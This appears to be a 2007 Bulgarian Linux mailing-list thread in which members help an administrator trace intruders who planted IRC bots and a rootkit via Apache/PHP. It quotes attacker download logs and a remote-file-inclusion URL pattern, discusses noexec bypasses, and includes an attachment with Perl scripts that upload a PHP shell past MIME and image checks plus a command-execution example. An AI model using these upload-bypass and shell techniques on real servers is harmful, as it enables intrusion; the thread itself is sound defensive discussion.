Re: [Lug-bg] пробив през апаче и пхп :(
1) Файла flood е tar.gz архив с няколко флудера, пингъра и други такива. 2) н.йпг е тар.гз архив със рооткит и бнц 3) веднага ама веднага сваляй машината offline и почвай да разглеждаш. Съветвам те да прегледаш какви приложения вървят на тоя апач. Много съмнително е да е през него пробива. Цялото тва нещо е работа на някое script kiddie On 11/07/07, deb4o <[EMAIL PROTECTED]> wrote: > няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на > irc bot > все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги > страртират. > но искам да разбера къде е дупката в апачето. > Apache 2.0.53 и php 4.3.9 > > Така и не мога да разбера от къде влизат. търсих по логовете но само > единственно в error log-a на апачето намирам подобни на тези неща: > > --00:43:08-- http://private.whitehat.ro/flood >=> `flood' > Resolving private.whitehat.ro... 72.22.77.22 > Connecting to private.whitehat.ro[72.22.77.22]:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 208,412 [text/plain] > > 0K .. .. .. .. .. 24% 60.12 > KB/s >50K .. .. .. .. .. 49% 237.64 > KB/s > 100K .. .. .. .. .. 73% 16.05 > KB/s > 150K .. .. .. .. .. 98% 60.06 > KB/s > 200K ... 100% 10.13 > MB/s > > 00:43:13 (40.79 KB/s) - `flood' saved [208412/208412] > > --- > --11:39:45-- http://private.whitehat.ro/n.jpg >=> `n.jpg' > Resolving private.whitehat.ro... 72.22.77.22 > Connecting to private.whitehat.ro[72.22.77.22]:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 261,375 [image/jpeg] > > 0K .. .. .. .. .. 19% 60.85 > KB/s >50K .. .. .. .. .. 39% 122.81 > KB/s > 100K .. .. .. .. .. 58% 16.38 > KB/s > 150K .. .. .. .. .. 78% 61.60 > KB/s > 200K .. .. .. .. .. 97% 81.52 > KB/s > 250K . 100%1.02 > MB/s > > 11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375] > > ___ > Lug-bg mailing list > Lug-bg@linux-bulgaria.org > http://linux-bulgaria.org/mailman/listinfo/lug-bg > -- С уважение, Владимир Витков http://www.netsecad.com http://www.supportbg.com ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
On Thu, Jul 12, 2007 at 09:23:00AM +0300, deb4o wrote: > On Thursday, July 12, 2007 9:04 AM, Vladimir Vitkov wrote: > > 1) Файла flood е tar.gz архив с няколко флудера, пингъра и други такива. > > 2) н.йпг е тар.гз архив със рооткит и бнц > > 3) веднага ама веднага сваляй машината offline и почвай да разглеждаш. > > > > Съветвам те да прегледаш какви приложения вървят на тоя апач. Много > > съмнително е да е през него пробива. Цялото тва нещо е работа на някое > > script kiddie > > е то първите две неща са ми ясни, > ясно ми е че през апач влизат > проблема е че обърнах всички логове и никъде не намирам къде е дупката през > която влизат... Според мен Владимир искаше да каже, че проблемът в сигурността вероятно не е нито в самия Apache, нито в самото PHP, а в някое от приложенията, които този Apache и това PHP пускат - разни форуми, блогове, електронни магазини, интерфейси към log analyzers, всякакви такива неща. Тях трябва да прегледаш - или поне да видиш какви такива неща са инсталирани, кои версии са, дали за тези версии няма известни проблеми в сигурността и така нататък. Поздрави, Петър -- Peter Pentchev [EMAIL PROTECTED][EMAIL PROTECTED][EMAIL PROTECTED] PGP key:http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 I am the thought you are now thinking. pgpTmIO9YurMS.pgp Description: PGP signature ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп : (
On Wed, July 11, 2007 11:16 pm, deb4o wrote: > няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на > irc bot > все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги > страртират. > но искам да разбера къде е дупката в апачето. > Apache 2.0.53 и php 4.3.9 > > Така и не мога да разбера от къде влизат. търсих по логовете но само > единственно в error log-a на апачето намирам подобни на тези неща: > > --00:43:08-- http://private.whitehat.ro/flood >=> `flood' > Resolving private.whitehat.ro... 72.22.77.22 > Connecting to private.whitehat.ro[72.22.77.22]:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 208,412 [text/plain] > > 0K .. .. .. .. .. 24% 60.12 > KB/s >50K .. .. .. .. .. 49% 237.64 > KB/s > 100K .. .. .. .. .. 73% 16.05 > KB/s > 150K .. .. .. .. .. 98% 60.06 > KB/s > 200K ... 100% 10.13 > MB/s > > 00:43:13 (40.79 KB/s) - `flood' saved [208412/208412] > > --- > --11:39:45-- http://private.whitehat.ro/n.jpg >=> `n.jpg' > Resolving private.whitehat.ro... 72.22.77.22 > Connecting to private.whitehat.ro[72.22.77.22]:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 261,375 [image/jpeg] > > 0K .. .. .. .. .. 19% 60.85 > KB/s >50K .. .. .. .. .. 39% 122.81 > KB/s > 100K .. .. .. .. .. 58% 16.38 > KB/s > 150K .. .. .. .. .. 78% 61.60 > KB/s > 200K .. .. .. .. .. 97% 81.52 > KB/s > 250K . 100%1.02 > MB/s > > 11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375] > > ___ > Lug-bg mailing list > Lug-bg@linux-bulgaria.org > http://linux-bulgaria.org/mailman/listinfo/lug-bg > Малко оффтопик, но nosuid,noexec е лека заблуда на противника: test:~# dd if=/dev/zero of=fs bs=1k count=100 100+0 records in 100+0 records out 102400 bytes (102 kB) copied, 0.000681537 seconds, 150 MB/s test:~# losetup -f fs test:~# mkfs.ext3 /dev/loop0 mke2fs 1.40-WIP (14-Nov-2006) Filesystem label= OS type: Linux test:~# test:~# mount -o loop,nosuid,noexec fs mnt test:~# mount|grep mnt /root/fs on /root/mnt type ext2 (rw,noexec,nosuid,loop=/dev/loop1) test:~# test:~/mnt# cat << EOF > test > #!/bin/bash > echo test > EOF test:~/mnt# test:~/mnt# chmod 0755 test test:~/mnt# ./test -su: ./test: /bin/bash: bad interpreter: Permission denied test:~/mnt# /bin/bash test test test:~/mnt# Пробвай safe_mode :) -- WWell by Iassen Anadoliev ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
deb4o wrote: > няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на > irc bot > все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги > страртират. /var/tmp също е със world writable права. Единствената разлика с /tmp е, че обикновено съдържанието на /var/tmp не се трие при стартирането на системата. -- regards, Georgi Alexandrov key server - pgp.mit.edu :: key id - 0x37B4B3EE Key fingerprint = E429 BF93 FA67 44E9 B7D4 F89E F990 01C1 37B4 B3EE signature.asc Description: OpenPGP digital signature ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
Имах подобен проблем с един от сайтовете при мен. Можеш в php.ini да добавиш примерно: /disable_functions = exec,passthru,system,proc_open,shell_exec/ С това ще забраниш изпълнението по-често използваните функции за изпълнение на команди. Преди това обаче е добре да разбереш как успяват да накарат PHPто да изпълнява въпросните функции. В моя случай в бъгавият сайт имаше глупост от типа на: /include( $path . "/neshtosi.php" );/ Променливата $path не винаги се установяваше и хахорите извикваха адрес от типа на: /http://my.site.com/shitty-script.php?path=http://their.site.com/their-script.txt&/ Ако имаш много сайтове и не можеш да разбереш през кой от тях ти правят мизерията, погледни кой е потребителят-собственик на изтеглените файлове. Това би свършило работа, ако PHP работи като CGI и използваш SUExec. Ако е като модул и имаш късмета да си с Apache 2, пробвай да инсталираш MPM ITK (в Debian и Ubuntu пакетът е apache2-mpm-itk). Разбереш ли кой е потребителят, ще трябва да претърсиш файловете им за include, include_once, require и require_once, за да видиш кои от тях използват динамични несигурни пътища. Нищо чудно това да е стара версия на софтуер с известни проблеми. Поздрави, Валери. deb4o wrote: няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на irc bot все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги страртират. но искам да разбера къде е дупката в апачето. Apache 2.0.53 и php 4.3.9 Така и не мога да разбера от къде влизат. търсих по логовете но само единственно в error log-a на апачето намирам подобни на тези неща: --00:43:08-- http://private.whitehat.ro/flood => `flood' Resolving private.whitehat.ro... 72.22.77.22 Connecting to private.whitehat.ro[72.22.77.22]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 208,412 [text/plain] 0K .. .. .. .. .. 24% 60.12 KB/s 50K .. .. .. .. .. 49% 237.64 KB/s 100K .. .. .. .. .. 73% 16.05 KB/s 150K .. .. .. .. .. 98% 60.06 KB/s 200K ... 100% 10.13 MB/s 00:43:13 (40.79 KB/s) - `flood' saved [208412/208412] --- --11:39:45-- http://private.whitehat.ro/n.jpg => `n.jpg' Resolving private.whitehat.ro... 72.22.77.22 Connecting to private.whitehat.ro[72.22.77.22]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 261,375 [image/jpeg] 0K .. .. .. .. .. 19% 60.85 KB/s 50K .. .. .. .. .. 39% 122.81 KB/s 100K .. .. .. .. .. 58% 16.38 KB/s 150K .. .. .. .. .. 78% 61.60 KB/s 200K .. .. .. .. .. 97% 81.52 KB/s 250K . 100%1.02 MB/s 11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375] ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп : (
Iassen Anadoliev wrote: > Малко оффтопик, но nosuid,noexec е лека заблуда на противника: > test:~# dd if=/dev/zero of=fs bs=1k count=100 > 100+0 records in > 100+0 records out > 102400 bytes (102 kB) copied, 0.000681537 seconds, 150 MB/s > test:~# losetup -f fs > test:~# mkfs.ext3 /dev/loop0 > mke2fs 1.40-WIP (14-Nov-2006) > Filesystem label= > OS type: Linux > > > test:~# > test:~# mount -o loop,nosuid,noexec fs mnt > test:~# mount|grep mnt > /root/fs on /root/mnt type ext2 (rw,noexec,nosuid,loop=/dev/loop1) > test:~# > test:~/mnt# cat << EOF > test >> #!/bin/bash >> echo test >> EOF > test:~/mnt# > test:~/mnt# chmod 0755 test > test:~/mnt# ./test > -su: ./test: /bin/bash: bad interpreter: Permission denied > test:~/mnt# /bin/bash test > test > test:~/mnt# > > Пробвай safe_mode :) > Не е заблуда на противника. noexec оптцията прави точно това което трябва да прави. От man 8 mount: "noexec Do not allow direct execution of any *binaries* on the mounted file system. (Until recently it was possible to run binaries anyway using a command like /lib/ld*.so /mnt/binary. This trick fails since Linux 2.4.25 / 2.6.0.)" Това е обсъждано и друг път тук, погледни архива на листа. -- regards, Georgi Alexandrov key server - pgp.mit.edu :: key id - 0x37B4B3EE Key fingerprint = E429 BF93 FA67 44E9 B7D4 F89E F990 01C1 37B4 B3EE signature.asc Description: OpenPGP digital signature ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
[Lug-bg] Странен процес в Дебиан
Здравейте, група, ps auxми дава измежду другите неща и това : root 6872 0.0 0.1 3780 768 ?SJul06 0:00 -:0 Това последното -:0 ми изглежда странно. Може ли някой да ми каже какво е? Поздрави Георги. ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
Здравей, за съжаление не мога да дам съвет къде точно е проблема. Тъй като имах преди време подобен проблем, освен нещата които вече се написаха като защита, мога да ти препоръчам да сложиш mod_security. Може би малко време ще ти отнеме докато го настроши, но мисля, че си заслужава. Може да го намериш тук: http://www.modsecurity.org/ Поздрави и успех! На 11.7.2007 23:16 deb4o пише: > няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на > irc bot > все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги > страртират. > но искам да разбера къде е дупката в апачето. > Apache 2.0.53 и php 4.3.9 > > Така и не мога да разбера от къде влизат. търсих по логовете но само > единственно в error log-a на апачето намирам подобни на тези неща: > > ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
В прикаченото файлче съм описал основните атаки върху web applications. Най-често в момента се случва да се използват атаките върху getimagesize function-а на PHP. За съжаление, няма директно решение на проблема с getimagesize :( Поздрави Мариан On Thursday 12 July 2007 11:08:38 Valery Dachev wrote: > Имах подобен проблем с един от сайтовете при мен. Можеш в php.ini да > добавиш примерно: > > /disable_functions = exec,passthru,system,proc_open,shell_exec/ > > С това ще забраниш изпълнението по-често използваните функции за > изпълнение на команди. > > Преди това обаче е добре да разбереш как успяват да накарат PHPто да > изпълнява въпросните функции. В моя случай в бъгавият сайт имаше глупост > от типа на: > > /include( $path . "/neshtosi.php" );/ > > Променливата $path не винаги се установяваше и хахорите извикваха адрес > от типа на: > > > /http://my.site.com/shitty-script.php?path=http://their.site.com/their-scri >pt.txt&/ > > Ако имаш много сайтове и не можеш да разбереш през кой от тях ти правят > мизерията, погледни кой е потребителят-собственик на изтеглените > файлове. Това би свършило работа, ако PHP работи като CGI и използваш > SUExec. Ако е като модул и имаш късмета да си с Apache 2, пробвай да > инсталираш MPM ITK (в Debian и Ubuntu пакетът е apache2-mpm-itk). > Разбереш ли кой е потребителят, ще трябва да претърсиш файловете им за > include, include_once, require и require_once, за да видиш кои от тях > използват динамични несигурни пътища. Нищо чудно това да е стара версия > на софтуер с известни проблеми. > > Поздрави, > Валери. > ATTACK 1: #!/usr/bin/perl use LWP; # we are using libwwwperl use HTTP::Request::Common; $ua = $ua = LWP::UserAgent->new; # UserAgent is an HTTP client $res = $ua->request(POST 'http://localhost/upload1.php', # send POS Content_Type => 'form-data', # The cont # multipart/form-data ? the standard for form-based fi Content => [ userfile => ["shell.php", "shell.php"],# The body # request will contain the shell.php file ], ); print $res->as_string(); # Print out the response from the server RESULT: POST /upload1.php HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: localhost User-Agent: libwww-perl/5.803 Content-Length: 156 Content-Type: multipart/form-data; boundary=xYzZY --xYzZY Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: text/plain --xYzZY-- HTTP/1.1 200 OK Date: Wed, 13 Jun 2007 12:25:32 GMT Server: Apache X-Powered-By: PHP/4.4.4 Content-Length: 48 Connection: close Content-Type: text/html File is valid, and was successfully uploaded. COMMAND EXECUTION: $ curl http://localhost/uploads/shell.php?command=id uid=81(apache) gid=81(apache) groups=81(apache) VERIFING THE MIME TYPE: RESULT: POST /upload2.php HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: localhost User-Agent: libwww-perl/5.803 Content-Type: multipart/form-data; boundary=xYzZY Content-Length: 156 --xYzZY Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: text/plain --xYzZY-- HTTP/1.1 200 OK Date: Thu, 13 Jun 2007 13:54:01 GMT Server: Apache X-Powered-By: PHP/4.4.4 Content-Length: 41 Connection: close Content-Type: text/html Sorry, we only allow uploading GIF images ATTACK 2: #!/usr/bin/perl # use LWP; use HTTP::Request::Common; $ua = $ua = LWP::UserAgent->new;; $res = $ua->request(POST 'http://localhost/upload2.php', Content_Type => 'form-data', Content => [ userfile => ["shell.php", "shell.php", "Content-Type" => "image/gif"], ], ); print $res->as_string(); RESULT: POST /upload2.php HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: localhost User-Agent: libwww-perl/5.803 Content-Type: multipart/form-data; boundary=xYzZY Content-Length: 155 --xYzZY Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: image/gif --xYzZY-- HTTP/1.1 200 OK Date: Thu, 13 Jun 2007 14:02:11 GMT Server: Apache X-Powered-By: PHP/4.4.4 Content-Length: 59 Connection: close Content-Type: text/html File is valid, and was successfully uploaded. VALIDATING IMAGE CONTENT: COMMAND: POST /upload3.php HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: localhost User-Agent: libwww-perl/5.803 Content-Type: multipart/form-data; boundary=xYzZY Content-Length: 155 --xYzZY Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: image/gif --xYzZY-- HTTP/1.1 200 OK Date: Thu, 13 Jun 2007 14:33:35 GMT Server: Apache X-Powered-By: PHP/4.4.4 RESULT: Content-Length: 42 Connection: close Content-Type: text/html Sorry, we only accept GIF and JPEG images ATTACK 3: #!/usr/bin/perl # use LWP; use HTTP::Request::Common; $ua = $ua = LWP::UserAgent->new;; $res = $ua->request(POST 'http://localhost/upload3.php', Content_Type => 'form-data',
Re: [Lug-bg] пробив през апаче и пхп :(
On Thursday 12 July 2007 11:27:16 Georgi Alexandrov wrote: > deb4o wrote: > > няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на > > irc bot > > все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги > > страртират. > > > > /var/tmp също е със world writable права. Единствената разлика с /tmp е, > че обикновено съдържанието на /var/tmp не се трие при стартирането на > системата. Ако използваш suexec, в 90% от ситуациите от там може да се види кой/какво е стартирало определения файл. Отново в 90% от случайте... в момента в който това се стартира, файловете от които се е стартирало приложението биват изтрити. Поздрави Мариян ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
safe_mode не е добър вариант за решение, имам доста виртуални хостове на сайтове, никой от тях не използва perl/cgi а само пхп за всеки сайта съм сетнал open_base dir и не могат да отварят нищо освен собсвената си директория. единственно session_path не съм сетвал допълнително и е по подразбиране в /tmp /var/tmp съм я направил като symbolic link към дяла /tmp и там не могат да се стартират бинарни файлове. - Original Message - From: Valery Dachev To: Linux Users Group - Bulgaria Sent: Thursday, July 12, 2007 11:08 AM Subject: Re: [Lug-bg] пробив през апаче и пхп :( Имах подобен проблем с един от сайтовете при мен. Можеш в php.ini да добавиш примерно: disable_functions = exec,passthru,system,proc_open,shell_exec С това ще забраниш изпълнението по-често използваните функции за изпълнение на команди. Преди това обаче е добре да разбереш как успяват да накарат PHPто да изпълнява въпросните функции. В моя случай в бъгавият сайт имаше глупост от типа на: include( $path . "/neshtosi.php" ); Променливата $path не винаги се установяваше и хахорите извикваха адрес от типа на: http://my.site.com/shitty-script.php?path=http://their.site.com/their-script.txt&; Ако имаш много сайтове и не можеш да разбереш през кой от тях ти правят мизерията, погледни кой е потребителят-собственик на изтеглените файлове. Това би свършило работа, ако PHP работи като CGI и използваш SUExec. Ако е като модул и имаш късмета да си с Apache 2, пробвай да инсталираш MPM ITK (в Debian и Ubuntu пакетът е apache2-mpm-itk). Разбереш ли кой е потребителят, ще трябва да претърсиш файловете им за include, include_once, require и require_once, за да видиш кои от тях използват динамични несигурни пътища. Нищо чудно това да е стара версия на софтуер с известни проблеми. Поздрави, Валери. deb4o wrote: няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на irc bot все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги страртират. но искам да разбера къде е дупката в апачето. Apache 2.0.53 и php 4.3.9 Така и не мога да разбера от къде влизат. търсих по логовете но само единственно в error log-a на апачето намирам подобни на тези неща: --00:43:08-- http://private.whitehat.ro/flood => `flood' Resolving private.whitehat.ro... 72.22.77.22 Connecting to private.whitehat.ro[72.22.77.22]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 208,412 [text/plain] 0K .. .. .. .. .. 24% 60.12 KB/s 50K .. .. .. .. .. 49% 237.64 KB/s 100K .. .. .. .. .. 73% 16.05 KB/s 150K .. .. .. .. .. 98% 60.06 KB/s 200K ... 100% 10.13 MB/s 00:43:13 (40.79 KB/s) - `flood' saved [208412/208412] --- --11:39:45-- http://private.whitehat.ro/n.jpg => `n.jpg' Resolving private.whitehat.ro... 72.22.77.22 Connecting to private.whitehat.ro[72.22.77.22]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 261,375 [image/jpeg] 0K .. .. .. .. .. 19% 60.85 KB/s 50K .. .. .. .. .. 39% 122.81 KB/s 100K .. .. .. .. .. 58% 16.38 KB/s 150K .. .. .. .. .. 78% 61.60 KB/s 200K .. .. .. .. .. 97% 81.52 KB/s 250K . 100%1.02 MB/s 11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375] ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg -- ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
deb4o wrote: > е то първите две неща са ми ясни, > ясно ми е че през апач влизат > проблема е че обърнах всички логове и никъде не намирам къде е дупката през > която влизат... По-скоро разгледай какви php приложения се обслужват от уеб сървъра. -- regards, Georgi Alexandrov key server - pgp.mit.edu :: key id - 0x37B4B3EE Key fingerprint = E429 BF93 FA67 44E9 B7D4 F89E F990 01C1 37B4 B3EE signature.asc Description: OpenPGP digital signature ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Странен процес в Дебиан
Прилича ми на X. On 7/12/07, Georgi <[EMAIL PROTECTED]> wrote: Здравейте, група, ps auxми дава измежду другите неща и това : root 6872 0.0 0.1 3780 768 ?SJul06 0:00 -:0 Това последното -:0 ми изглежда странно. Може ли някой да ми каже какво е? Поздрави Георги. ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
> е то първите две неща са ми ясни, > ясно ми е че през апач влизат > проблема е че обърнах всички логове и никъде не намирам къде е дупката през > която влизат... Има ли записи в access log-a на апачето в този час - 00:43:08/11:39:45 (не в същата секунда, поне в същата една минута)? Може да пробваш един "grep -r -F '00:43' /" за да си сигурен, че не пропускаш някой лог (например лога по подразбиране, когато нямаш VH). Съжелявам, ако предлагам очевидното. -- Svilen Ivanov http://svilen-online.blogspot.com There is no dark side of the moon really. Matter of fact it's all dark. ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
Има доста информация в интернет как можеш да стартираш бинарен файл върху дял който е монтиран noexec. Основната идея е да се използва /lib/ld-linux.so.2 /path/to/binary/file Е, за да работи това ти трябва специално преправен файл но като цяло няма такова нещо като немогат да се стартират програми от този дял(освен ако не си с RSBAC, RBAC, NSA SElinux или друг подобен security patch). Поздрави Мариян On Thursday 12 July 2007 13:53:53 deb4o wrote: > safe_mode не е добър вариант за решение, имам доста виртуални хостове на > сайтове, никой от тях не използва perl/cgi а само пхп за всеки сайта съм > сетнал open_base dir и не могат да отварят нищо освен собсвената си > директория. единственно session_path не съм сетвал допълнително и е по > подразбиране в /tmp > > /var/tmp съм я направил като symbolic link към дяла /tmp и там не могат да > се стартират бинарни файлове. > > > > > - Original Message - > From: Valery Dachev > To: Linux Users Group - Bulgaria > Sent: Thursday, July 12, 2007 11:08 AM > Subject: Re: [Lug-bg] пробив през апаче и пхп :( > > > Имах подобен проблем с един от сайтовете при мен. Можеш в php.ini да > добавиш примерно: > > disable_functions = exec,passthru,system,proc_open,shell_exec > > С това ще забраниш изпълнението по-често използваните функции за > изпълнение на команди. > > Преди това обаче е добре да разбереш как успяват да накарат PHPто да > изпълнява въпросните функции. В моя случай в бъгавият сайт имаше глупост от > типа на: > > include( $path . "/neshtosi.php" ); > > Променливата $path не винаги се установяваше и хахорите извикваха адрес > от типа на: > > > http://my.site.com/shitty-script.php?path=http://their.site.com/their-scrip >t.txt& > > Ако имаш много сайтове и не можеш да разбереш през кой от тях ти правят > мизерията, погледни кой е потребителят-собственик на изтеглените файлове. > Това би свършило работа, ако PHP работи като CGI и използваш SUExec. Ако е > като модул и имаш късмета да си с Apache 2, пробвай да инсталираш MPM ITK > (в Debian и Ubuntu пакетът е apache2-mpm-itk). Разбереш ли кой е > потребителят, ще трябва да претърсиш файловете им за include, include_once, > require и require_once, за да видиш кои от тях използват динамични > несигурни пътища. Нищо чудно това да е стара версия на софтуер с известни > проблеми. > > Поздрави, > Валери. > > deb4o wrote: > няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на > irc bot > все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги > страртират. > но искам да разбера къде е дупката в апачето. > Apache 2.0.53 и php 4.3.9 > > Така и не мога да разбера от къде влизат. търсих по логовете но само > единственно в error log-a на апачето намирам подобни на тези неща: > > --00:43:08-- http://private.whitehat.ro/flood >=> `flood' > Resolving private.whitehat.ro... 72.22.77.22 > Connecting to private.whitehat.ro[72.22.77.22]:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 208,412 [text/plain] > > 0K .. .. .. .. .. 24% 60.12 > KB/s >50K .. .. .. .. .. 49% 237.64 > KB/s > 100K .. .. .. .. .. 73% 16.05 > KB/s > 150K .. .. .. .. .. 98% 60.06 > KB/s > 200K ... 100% 10.13 > MB/s > > 00:43:13 (40.79 KB/s) - `flood' saved [208412/208412] > > --- > --11:39:45-- http://private.whitehat.ro/n.jpg >=> `n.jpg' > Resolving private.whitehat.ro... 72.22.77.22 > Connecting to private.whitehat.ro[72.22.77.22]:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 261,375 [image/jpeg] > > 0K .. .. .. .. .. 19% 60.85 > KB/s >50K .. .. .. .. .. 39% 122.81 > KB/s > 100K .. .. .. .. .. 58% 16.38 > KB/s > 150K .. .. .. .. .. 78% 61.60 > KB/s > 200K .. .. .. .. .. 97% 81.52 > KB/s > 250K . 100%1.02 > MB/s > > 11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375] > > ___ > Lug-bg mailing list > Lug-bg@linux-bulgaria.org > http://linux-bulgaria.org/mailman/listinfo/lug-bg > > > > > --- >--- > > > ___ > Lug-bg mailing list > Lug-bg@linux-bulgaria.org > http://linux-bulgaria.org/mailman/listinfo/lug-bg ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Странен процес в Дебиан
On Thursday 12 July 2007 13:10:11 Ivan Petrushev wrote: > Прилича ми на X. > > On 7/12/07, Georgi <[EMAIL PROTECTED]> wrote: > > Здравейте, група, > > ps auxми дава измежду другите неща и това : > > root 6872 0.0 0.1 3780 768 ?SJul06 0:00 > > -:0 > > > > > > Това последното -:0 ми изглежда странно. > > Може ли някой да ми каже какво е? > > > > Поздрави > > Георги. Пусни си lsof +p 6872 и виж дефакто какво е :) Мариян ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
1. сменяш allow_url_fopen = Off в php.ini. 2. рестартираш apache-то. 3. теглиш http://downloads.sourceforge.net/rkhunter/rkhunter-1.2.9.tar.gz 4. инсталираш, пускаш да провери, ако има нещо - отсраняваш. 5. спиш спокойно :-) ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
Around 07/12/07 15:29, Marian Marinov scribbled: > Има доста информация в интернет как можеш да стартираш бинарен файл върху дял > който е монтиран noexec. Основната идея е да се > използва /lib/ld-linux.so.2 /path/to/binary/file Това отдавна не работи, от 2.5 нещо си нататък. При файла зареден от noexec партишън ядрото не позволява паметта в която е зареден да бъде маркирана като PROT_EXEC (ако си спомням правилно) ефективно това не дава на динамичния линкер (ld-linux.so.2) да линкне и изпълни файла. Разбира се ако имаш някъде интерпретатор като perl, php, bash и файл написан на някой от тези скриптови езици, можеш да изпълниш /bin/interpretatora faila, но на партишън с noxec няма начин да изпълниш компилиран код (освен ако в ядрото няма някоя грешка) -- Georgi Chorbadzhiyski http://georgi.unixsol.org/ ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
Мда mount -o remount,noexec,nosuid /tmp # mount |grep tmp tmpfs on /dev/shm type tmpfs (rw) /dev/mapper/vg00-lv_tmp on /tmp type ext3 (rw,noexec,nosuid) # file /bin/ls /bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, stripped # cp /bin/ls /tmp/ls_test # /lib/ld-linux.so.2 /tmp/ls_test /tmp/ls_test: error while loading shared libraries: /tmp/ls_test: failed to map segment from shared object: Operation not permitted # Georgi Chorbadzhiyski <[EMAIL PROTECTED]> Sent by: [EMAIL PROTECTED] 12.07.2007 16:13 Please respond to Linux Users Group - Bulgaria To Linux Users Group - Bulgaria cc Subject Re: [Lug-bg] пробив през апаче и пхп :( Around 07/12/07 15:29, Marian Marinov scribbled: > Има доста информация в интернет как можеш да стартираш бинарен файл върху дял > който е монтиран noexec. Основната идея е да се > използва /lib/ld-linux.so.2 /path/to/binary/file Това отдавна не работи, от 2.5 нещо си нататък. При файла зареден от noexec партишън ядрото не позволява паметта в която е зареден да бъде маркирана като PROT_EXEC (ако си спомням правилно) ефективно това не дава на динамичния линкер (ld-linux.so.2) да 